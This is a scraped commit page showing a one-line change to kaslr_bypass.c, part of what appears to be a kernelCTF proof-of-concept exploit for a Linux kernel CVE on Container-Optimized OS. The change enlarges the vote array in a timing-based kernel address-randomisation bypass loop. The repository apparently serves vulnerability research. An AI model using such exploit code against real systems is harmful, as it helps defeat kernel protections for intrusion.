We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 4b96751 commit ceda02dCopy full SHA for ceda02d
pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/kaslr_bypass.c
@@ -67,7 +67,7 @@ int bypass_kaslr(uint64_t base) {
67
#define END (0xffffffffD0000000ull + OFFSET)
68
#define STEP 0x0000000001000000ull
69
while (1) {
70
- uint64_t bases[5] = {0};
+ uint64_t bases[7] = {0};
71
for (int vote = 0; vote < ARRAY_LEN(bases); vote ++) {
72
size_t times[(END - START) / STEP] = {};
73
uint64_t addrs[(END - START) / STEP];
0 commit comments